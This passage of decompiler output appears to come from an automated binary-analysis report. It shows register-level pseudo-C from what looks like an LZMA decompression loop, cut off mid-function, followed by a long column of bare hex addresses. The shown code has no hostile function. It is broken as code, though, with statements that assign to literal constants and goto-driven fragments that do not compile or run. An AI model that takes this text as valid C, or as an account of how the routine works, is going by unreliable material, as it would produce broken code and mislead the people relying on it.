														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                                                          0x00000000
                                                                                                                          0x00406473
                                                                                                                          0x00406473
                                                                                                                          0x00406477
                                                                                                                          0x00406498
                                                                                                                          0x0040649f
                                                                                                                          0x004064a5
                                                                                                                          0x004064ab
                                                                                                                          0x004064bd
                                                                                                                          0x004064c3
                                                                                                                          0x004064c8
                                                                                                                          0x00000000
                                                                                                                          0x00406479
                                                                                                                          0x0040647f
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00406843
                                                                                                                          0x00406843
                                                                                                                          0x00406843
                                                                                                                          0x00406849
                                                                                                                          0x0040684f
                                                                                                                          0x00406855
                                                                                                                          0x0040686f
                                                                                                                          0x00406872
                                                                                                                          0x00406878
                                                                                                                          0x00406883
                                                                                                                          0x00406885
                                                                                                                          0x00406857
                                                                                                                          0x00406857
                                                                                                                          0x00406866
                                                                                                                          0x0040686a
                                                                                                                          0x0040686a
                                                                                                                          0x0040688f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406891
                                                                                                                          0x00406895
                                                                                                                          0x00406a44
                                                                                                                          0x00406a5a
                                                                                                                          0x00406a62
                                                                                                                          0x00406a69
                                                                                                                          0x00406a6b
                                                                                                                          0x00406a72
                                                                                                                          0x00406a76
                                                                                                                          0x00406a76
                                                                                                                          0x004068a1
                                                                                                                          0x004068a8
                                                                                                                          0x004068b0
                                                                                                                          0x004068b3
                                                                                                                          0x004068b6
                                                                                                                          0x004068b6
                                                                                                                          0x004068bc
                                                                                                                          0x004068bc
                                                                                                                          0x00406058
                                                                                                                          0x00406058
                                                                                                                          0x00406058
                                                                                                                          0x00406061
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406067
                                                                                                                          0x00000000
                                                                                                                          0x00406072
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040607b
                                                                                                                          0x0040607e
                                                                                                                          0x00406081
                                                                                                                          0x00406085
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040608b
                                                                                                                          0x0040608e
                                                                                                                          0x00406090
                                                                                                                          0x00406091
                                                                                                                          0x00406094
                                                                                                                          0x00406096
                                                                                                                          0x00406097
                                                                                                                          0x00406099
                                                                                                                          0x0040609c
                                                                                                                          0x004060a1
                                                                                                                          0x004060a6
                                                                                                                          0x004060af
                                                                                                                          0x004060c2
                                                                                                                          0x004060c5
                                                                                                                          0x004060d1
                                                                                                                          0x004060f9
                                                                                                                          0x004060fb
                                                                                                                          0x00406109
                                                                                                                          0x00406109
                                                                                                                          0x0040610d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004060fd
                                                                                                                          0x004060fd
                                                                                                                          0x00406100
                                                                                                                          0x00406101
                                                                                                                          0x00406101
                                                                                                                          0x00000000
                                                                                                                          0x004060fd
                                                                                                                          0x004060d7
                                                                                                                          0x004060dc
                                                                                                                          0x004060dc
                                                                                                                          0x004060e5
                                                                                                                          0x004060ed
                                                                                                                          0x004060f0
                                                                                                                          0x00000000
                                                                                                                          0x004060f6
                                                                                                                          0x004060f6
                                                                                                                          0x00000000
                                                                                                                          0x004060f6
                                                                                                                          0x00000000
                                                                                                                          0x00406113
                                                                                                                          0x00406113
                                                                                                                          0x00406117
                                                                                                                          0x004069c3
                                                                                                                          0x00000000
                                                                                                                          0x004069c3
                                                                                                                          0x00406120
                                                                                                                          0x00406130
                                                                                                                          0x00406133
                                                                                                                          0x00406136
                                                                                                                          0x00406136
                                                                                                                          0x00406136
                                                                                                                          0x00406139
                                                                                                                          0x0040613d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040613f
                                                                                                                          0x00406145
                                                                                                                          0x0040616f
                                                                                                                          0x00406175
                                                                                                                          0x0040617c
                                                                                                                          0x00000000
                                                                                                                          0x0040617c
                                                                                                                          0x0040614b
                                                                                                                          0x0040614e
                                                                                                                          0x00406153
                                                                                                                          0x00406153
                                                                                                                          0x0040615e
                                                                                                                          0x00406166
                                                                                                                          0x00406169
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061ae
                                                                                                                          0x004061b4
                                                                                                                          0x004061b7
                                                                                                                          0x004061c4
                                                                                                                          0x004061cc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00406187
                                                                                                                          0x004069d2
                                                                                                                          0x00000000
                                                                                                                          0x004069d2
                                                                                                                          0x00406193
                                                                                                                          0x0040619e
                                                                                                                          0x0040619e
                                                                                                                          0x0040619e
                                                                                                                          0x004061a1
                                                                                                                          0x004061a4
                                                                                                                          0x004061a7
                                                                                                                          0x004061ac
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406843
                                                                                                                          0x00406843
                                                                                                                          0x00406849
                                                                                                                          0x0040684f
                                                                                                                          0x00406855
                                                                                                                          0x0040686f
                                                                                                                          0x00406872
                                                                                                                          0x00406878
                                                                                                                          0x00406883
                                                                                                                          0x00406885
                                                                                                                          0x00406857
                                                                                                                          0x00406857
                                                                                                                          0x00406866
                                                                                                                          0x0040686a
                                                                                                                          0x0040686a
                                                                                                                          0x0040688f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061d4
                                                                                                                          0x004061d6
                                                                                                                          0x004061d9
                                                                                                                          0x0040624a
                                                                                                                          0x0040624d
                                                                                                                          0x00406250
                                                                                                                          0x00406257
                                                                                                                          0x00406261
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x00406840
                                                                                                                          0x004061db
                                                                                                                          0x004061df
                                                                                                                          0x004061e2
                                                                                                                          0x004061e4
                                                                                                                          0x004061e7
                                                                                                                          0x004061ea
                                                                                                                          0x004061ec
                                                                                                                          0x004061ef
                                                                                                                          0x004061f1
                                                                                                                          0x004061f6
                                                                                                                          0x004061f9
                                                                                                                          0x004061fc
                                                                                                                          0x00406200
                                                                                                                          0x00406207
                                                                                                                          0x0040620a
                                                                                                                          0x00406211
                                                                                                                          0x00406215
                                                                                                                          0x0040621d
                                                                                                                          0x0040621d
                                                                                                                          0x0040621d
                                                                                                                          0x00406217
                                                                                                                          0x00406217
                                                                                                                          0x00406217
                                                                                                                          0x0040620c
                                                                                                                          0x0040620c
                                                                                                                          0x0040620c
                                                                                                                          0x00406221
                                                                                                                          0x00406224
                                                                                                                          0x00406242
                                                                                                                          0x00406244
                                                                                                                          0x00000000
                                                                                                                          0x00406226
                                                                                                                          0x00406226
                                                                                                                          0x00406229
                                                                                                                          0x0040622c
                                                                                                                          0x0040622f
                                                                                                                          0x00406231
                                                                                                                          0x00406231
                                                                                                                          0x00406231
                                                                                                                          0x00406234
                                                                                                                          0x00406237
                                                                                                                          0x00406239
                                                                                                                          0x0040623a
                                                                                                                          0x0040623d
                                                                                                                          0x00000000
                                                                                                                          0x0040623d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064dd
                                                                                                                          0x004064e1
                                                                                                                          0x00406504
                                                                                                                          0x00406507
                                                                                                                          0x0040650a
                                                                                                                          0x00406514
                                                                                                                          0x004064e3
                                                                                                                          0x004064e3
                                                                                                                          0x004064e6
                                                                                                                          0x004064e9
                                                                                                                          0x004064ec
                                                                                                                          0x004064f9
                                                                                                                          0x004064fc
                                                                                                                          0x004064fc
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x00406520
                                                                                                                          0x00406524
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040652a
                                                                                                                          0x0040652e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406534
                                                                                                                          0x00406536
                                                                                                                          0x0040653a
                                                                                                                          0x0040653a
                                                                                                                          0x0040653d
                                                                                                                          0x00406541
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406591
                                                                                                                          0x00406595
                                                                                                                          0x0040659c
                                                                                                                          0x0040659f
                                                                                                                          0x004065a2
                                                                                                                          0x004065ac
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00406597
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004065b8
                                                                                                                          0x004065bc
                                                                                                                          0x004065c3
                                                                                                                          0x004065c6
                                                                                                                          0x004065c9
                                                                                                                          0x004065be
                                                                                                                          0x004065be
                                                                                                                          0x004065be
                                                                                                                          0x004065cc
                                                                                                                          0x004065cf
                                                                                                                          0x004065d2
                                                                                                                          0x004065d2
                                                                                                                          0x004065d5
                                                                                                                          0x004065d8
                                                                                                                          0x004065db
                                                                                                                          0x004065db
                                                                                                                          0x004065de
                                                                                                                          0x004065e5
                                                                                                                          0x004065ea
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406678
                                                                                                                          0x00406678
                                                                                                                          0x0040667c
                                                                                                                          0x00406a1a
                                                                                                                          0x00000000
                                                                                                                          0x00406a1a
                                                                                                                          0x00406682
                                                                                                                          0x00406685
                                                                                                                          0x00406688
                                                                                                                          0x0040668c
                                                                                                                          0x0040668f
                                                                                                                          0x00406695
                                                                                                                          0x00406697
                                                                                                                          0x00406697
                                                                                                                          0x00406697
                                                                                                                          0x0040669a
                                                                                                                          0x0040669d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040626d
                                                                                                                          0x0040626d
                                                                                                                          0x00406271
                                                                                                                          0x004069de
                                                                                                                          0x00000000
                                                                                                                          0x004069de
                                                                                                                          0x00406277
                                                                                                                          0x0040627a
                                                                                                                          0x0040627d
                                                                                                                          0x00406281
                                                                                                                          0x00406284
                                                                                                                          0x0040628a
                                                                                                                          0x0040628c
                                                                                                                          0x0040628c
                                                                                                                          0x0040628c
                                                                                                                          0x0040628f
                                                                                                                          0x00406292
                                                                                                                          0x00406292
                                                                                                                          0x00406295
                                                                                                                          0x00406298
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040629e
                                                                                                                          0x004062a4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062aa
                                                                                                                          0x004062aa
                                                                                                                          0x004062ae
                                                                                                                          0x004062b1
                                                                                                                          0x004062b4
                                                                                                                          0x004062b7
                                                                                                                          0x004062ba
                                                                                                                          0x004062bb
                                                                                                                          0x004062be
                                                                                                                          0x004062c0
                                                                                                                          0x004062c6
                                                                                                                          0x004062c9
                                                                                                                          0x004062cc
                                                                                                                          0x004062cf
                                                                                                                          0x004062d2
                                                                                                                          0x004062d5
                                                                                                                          0x004062d8
                                                                                                                          0x004062f4
                                                                                                                          0x004062f7
                                                                                                                          0x004062fa
                                                                                                                          0x004062fd
                                                                                                                          0x00406304
                                                                                                                          0x00406308
                                                                                                                          0x0040630a
                                                                                                                          0x0040630e
                                                                                                                          0x004062da
                                                                                                                          0x004062da
                                                                                                                          0x004062de
                                                                                                                          0x004062e6
                                                                                                                          0x004062eb
                                                                                                                          0x004062ed
                                                                                                                          0x004062ef
                                                                                                                          0x004062ef
                                                                                                                          0x00406311
                                                                                                                          0x00406318
                                                                                                                          0x0040631b
                                                                                                                          0x00000000
                                                                                                                          0x00406321
                                                                                                                          0x00000000
                                                                                                                          0x00406321
                                                                                                                          0x00000000
                                                                                                                          0x00406326
                                                                                                                          0x00406326
                                                                                                                          0x0040632a
                                                                                                                          0x004069ea
                                                                                                                          0x00000000
                                                                                                                          0x004069ea
                                                                                                                          0x00406330
                                                                                                                          0x00406333
                                                                                                                          0x00406336
                                                                                                                          0x0040633a
                                                                                                                          0x0040633d
                                                                                                                          0x00406343
                                                                                                                          0x00406345
                                                                                                                          0x00406345
                                                                                                                          0x00406345
                                                                                                                          0x00406348
                                                                                                                          0x0040634b
                                                                                                                          0x0040634b
                                                                                                                          0x0040634b
                                                                                                                          0x00406351
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406353
                                                                                                                          0x00406356
                                                                                                                          0x00406359
                                                                                                                          0x0040635c
                                                                                                                          0x0040635f
                                                                                                                          0x00406362
                                                                                                                          0x00406365
                                                                                                                          0x00406368
                                                                                                                          0x0040636b
                                                                                                                          0x0040636e
                                                                                                                          0x00406371
                                                                                                                          0x00406389
                                                                                                                          0x0040638c
                                                                                                                          0x0040638f
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x00406395
                                                                                                                          0x00406399
                                                                                                                          0x0040639b
                                                                                                                          0x00406373
                                                                                                                          0x00406373
                                                                                                                          0x0040637b
                                                                                                                          0x00406380
                                                                                                                          0x00406382
                                                                                                                          0x00406384
                                                                                                                          0x00406384
                                                                                                                          0x0040639e
                                                                                                                          0x004063a5
                                                                                                                          0x004063a8
                                                                                                                          0x00000000
                                                                                                                          0x004063aa
                                                                                                                          0x00000000
                                                                                                                          0x004063aa
                                                                                                                          0x004063a8
                                                                                                                          0x004063af
                                                                                                                          0x004063af
                                                                                                                          0x004063af
                                                                                                                          0x004063af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063ea
                                                                                                                          0x004063ea
                                                                                                                          0x004063ee
                                                                                                                          0x004069f6
                                                                                                                          0x00000000
                                                                                                                          0x004069f6
                                                                                                                          0x004063f4
                                                                                                                          0x004063f7
                                                                                                                          0x004063fa
                                                                                                                          0x004063fe
                                                                                                                          0x00406401
                                                                                                                          0x00406407
                                                                                                                          0x00406409
                                                                                                                          0x00406409
                                                                                                                          0x00406409
                                                                                                                          0x0040640c
                                                                                                                          0x0040640f
                                                                                                                          0x0040640f
                                                                                                                          0x00406415
                                                                                                                          0x004063b3
                                                                                                                          0x004063b3
                                                                                                                          0x004063b6
                                                                                                                          0x00000000
                                                                                                                          0x004063b6
                                                                                                                          0x00406417
                                                                                                                          0x00406417
                                                                                                                          0x0040641a
                                                                                                                          0x0040641d
                                                                                                                          0x00406420
                                                                                                                          0x00406423
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642c
                                                                                                                          0x0040642f
                                                                                                                          0x00406432
                                                                                                                          0x00406435
                                                                                                                          0x0040644d
                                                                                                                          0x00406450
                                                                                                                          0x00406453
                                                                                                                          0x00406456
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645d
                                                                                                                          0x0040645f
                                                                                                                          0x00406437
                                                                                                                          0x00406437
                                                                                                                          0x0040643f
                                                                                                                          0x00406444
                                                                                                                          0x00406446
                                                                                                                          0x00406448
                                                                                                                          0x00406448
                                                                                                                          0x00406462
                                                                                                                          0x00406469
                                                                                                                          0x0040646c
                                                                                                                          0x00000000
                                                                                                                          0x0040646e
                                                                                                                          0x00000000
                                                                                                                          0x0040646e
                                                                                                                          0x00000000
                                                                                                                          0x004066fb
                                                                                                                          0x004066fb
                                                                                                                          0x004066ff
                                                                                                                          0x00406a26
                                                                                                                          0x00000000
                                                                                                                          0x00406a26
                                                                                                                          0x00406705
                                                                                                                          0x00406708
                                                                                                                          0x0040670b
                                                                                                                          0x0040670f
                                                                                                                          0x00406712
                                                                                                                          0x00406718
                                                                                                                          0x0040671a
                                                                                                                          0x0040671a
                                                                                                                          0x0040671a
                                                                                                                          0x0040671d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064cb
                                                                                                                          0x004064cb
                                                                                                                          0x004064ce
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x0040680a
                                                                                                                          0x0040680e
                                                                                                                          0x00406830
                                                                                                                          0x00406833
                                                                                                                          0x0040683d
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00406810
                                                                                                                          0x00406813
                                                                                                                          0x00406817
                                                                                                                          0x0040681a
                                                                                                                          0x0040681a
                                                                                                                          0x0040681d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004068c7
                                                                                                                          0x004068cb
                                                                                                                          0x004068e9
                                                                                                                          0x004068e9
                                                                                                                          0x004068e9
                                                                                                                          0x004068f0
                                                                                                                          0x004068f7
                                                                                                                          0x004068fe
                                                                                                                          0x004068fe
                                                                                                                          0x00000000
                                                                                                                          0x004068fe
                                                                                                                          0x004068cd
                                                                                                                          0x004068d0
                                                                                                                          0x004068d3
                                                                                                                          0x004068d6
                                                                                                                          0x004068dd
                                                                                                                          0x00406821
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069b8
                                                                                                                          0x004069bb
                                                                                                                          0x004068bc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004065f2
                                                                                                                          0x004065f4
                                                                                                                          0x004065fb
                                                                                                                          0x004065fc
                                                                                                                          0x004065fe
                                                                                                                          0x00406601
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406609
                                                                                                                          0x0040660c
                                                                                                                          0x0040660f
                                                                                                                          0x00406611
                                                                                                                          0x00406613
                                                                                                                          0x00406613
                                                                                                                          0x00406614
                                                                                                                          0x00406617
                                                                                                                          0x0040661e
                                                                                                                          0x00406621
                                                                                                                          0x0040662f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406905
                                                                                                                          0x00406905
                                                                                                                          0x00406908
                                                                                                                          0x0040690f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406914
                                                                                                                          0x00406914
                                                                                                                          0x00406918
                                                                                                                          0x00406a50
                                                                                                                          0x00000000
                                                                                                                          0x00406a50
                                                                                                                          0x0040691e
                                                                                                                          0x00406921
                                                                                                                          0x00406924
                                                                                                                          0x00406928
                                                                                                                          0x0040692b
                                                                                                                          0x00406931
                                                                                                                          0x00406933
                                                                                                                          0x00406933
                                                                                                                          0x00406933
                                                                                                                          0x00406936
                                                                                                                          0x00406939
                                                                                                                          0x00406939
                                                                                                                          0x00406939
                                                                                                                          0x00406939
                                                                                                                          0x0040693c
                                                                                                                          0x0040693c
                                                                                                                          0x00406940
                                                                                                                          0x004069a0
                                                                                                                          0x004069a3
                                                                                                                          0x004069a8
                                                                                                                          0x004069a9
                                                                                                                          0x004069ab
                                                                                                                          0x004069ad
                                                                                                                          0x004069b0
                                                                                                                          0x004068bc
                                                                                                                          0x004068bc
                                                                                                                          0x00000000
                                                                                                                          0x004068c2
                                                                                                                          0x004068bc
                                                                                                                          0x00406942
                                                                                                                          0x00406948
                                                                                                                          0x0040694b
                                                                                                                          0x0040694e
                                                                                                                          0x00406951
                                                                                                                          0x00406954
                                                                                                                          0x00406957
                                                                                                                          0x0040695a
                                                                                                                          0x0040695d
                                                                                                                          0x00406960
                                                                                                                          0x00406963
                                                                                                                          0x0040697c
                                                                                                                          0x0040697f
                                                                                                                          0x00406982
                                                                                                                          0x00406985
                                                                                                                          0x00406989
                                                                                                                          0x0040698b
                                                                                                                          0x0040698b
                                                                                                                          0x0040698c
                                                                                                                          0x0040698f
                                                                                                                          0x00406965
                                                                                                                          0x00406965
                                                                                                                          0x0040696d
                                                                                                                          0x00406972
                                                                                                                          0x00406974
                                                                                                                          0x00406977
                                                                                                                          0x00406977
                                                                                                                          0x00406992
                                                                                                                          0x00406999
                                                                                                                          0x00000000
                                                                                                                          0x0040699b
                                                                                                                          0x00000000
                                                                                                                          0x0040699b
                                                                                                                          0x00000000
                                                                                                                          0x00406637
                                                                                                                          0x0040663a
                                                                                                                          0x00406670
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a3
                                                                                                                          0x004067a3
                                                                                                                          0x004067a6
                                                                                                                          0x004067a8
                                                                                                                          0x00406a32
                                                                                                                          0x00000000
                                                                                                                          0x00406a32
                                                                                                                          0x004067ae
                                                                                                                          0x004067b1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067b7
                                                                                                                          0x004067bb
                                                                                                                          0x004067be
                                                                                                                          0x004067be
                                                                                                                          0x004067be
                                                                                                                          0x00000000
                                                                                                                          0x004067be
                                                                                                                          0x0040663c
                                                                                                                          0x0040663e
                                                                                                                          0x00406640
                                                                                                                          0x00406642
                                                                                                                          0x00406645
                                                                                                                          0x00406646
                                                                                                                          0x00406648
                                                                                                                          0x0040664a
                                                                                                                          0x0040664d
                                                                                                                          0x00406650
                                                                                                                          0x00406666
                                                                                                                          0x0040666b
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x004066d3
                                                                                                                          0x004066d5
                                                                                                                          0x004066dc
                                                                                                                          0x004066df
                                                                                                                          0x004066e2
                                                                                                                          0x004066e2
                                                                                                                          0x004066e7
                                                                                                                          0x004066e7
                                                                                                                          0x004066e9
                                                                                                                          0x004066ec
                                                                                                                          0x004066f3
                                                                                                                          0x004066f6
                                                                                                                          0x00406723
                                                                                                                          0x00406723
                                                                                                                          0x00406726
                                                                                                                          0x00406729
                                                                                                                          0x0040679d
                                                                                                                          0x0040679d
                                                                                                                          0x0040679d
                                                                                                                          0x00000000
                                                                                                                          0x0040679d
                                                                                                                          0x0040672b
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x0040673a
                                                                                                                          0x0040673d
                                                                                                                          0x00406740
                                                                                                                          0x00406743
                                                                                                                          0x00406746
                                                                                                                          0x00406749
                                                                                                                          0x0040674c
                                                                                                                          0x00406765
                                                                                                                          0x00406767
                                                                                                                          0x0040676a
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406773
                                                                                                                          0x00406775
                                                                                                                          0x00406777
                                                                                                                          0x0040677a
                                                                                                                          0x0040677c
                                                                                                                          0x0040677f
                                                                                                                          0x00406783
                                                                                                                          0x00406785
                                                                                                                          0x00406785
                                                                                                                          0x00406786
                                                                                                                          0x00406789
                                                                                                                          0x0040678c
                                                                                                                          0x0040674e
                                                                                                                          0x0040674e
                                                                                                                          0x00406756
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00406760
                                                                                                                          0x0040678f
                                                                                                                          0x00406796
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00000000
                                                                                                                          0x00406798
                                                                                                                          0x00000000
                                                                                                                          0x00406798
                                                                                                                          0x00406796
                                                                                                                          0x004066a9
                                                                                                                          0x004066ac
                                                                                                                          0x004066ae
                                                                                                                          0x004066b1
                                                                                                                          0x004066b4
                                                                                                                          0x004066b7
                                                                                                                          0x004066b9
                                                                                                                          0x004066bc
                                                                                                                          0x004066bf
                                                                                                                          0x004066bf
                                                                                                                          0x004066c2
                                                                                                                          0x004066c2
                                                                                                                          0x004066c5
                                                                                                                          0x004066cc
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x00000000
                                                                                                                          0x004066ce
                                                                                                                          0x00000000
                                                                                                                          0x004066ce
                                                                                                                          0x004066cc
                                                                                                                          0x00406652
                                                                                                                          0x00406655
                                                                                                                          0x00406657
                                                                                                                          0x0040665a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063b9
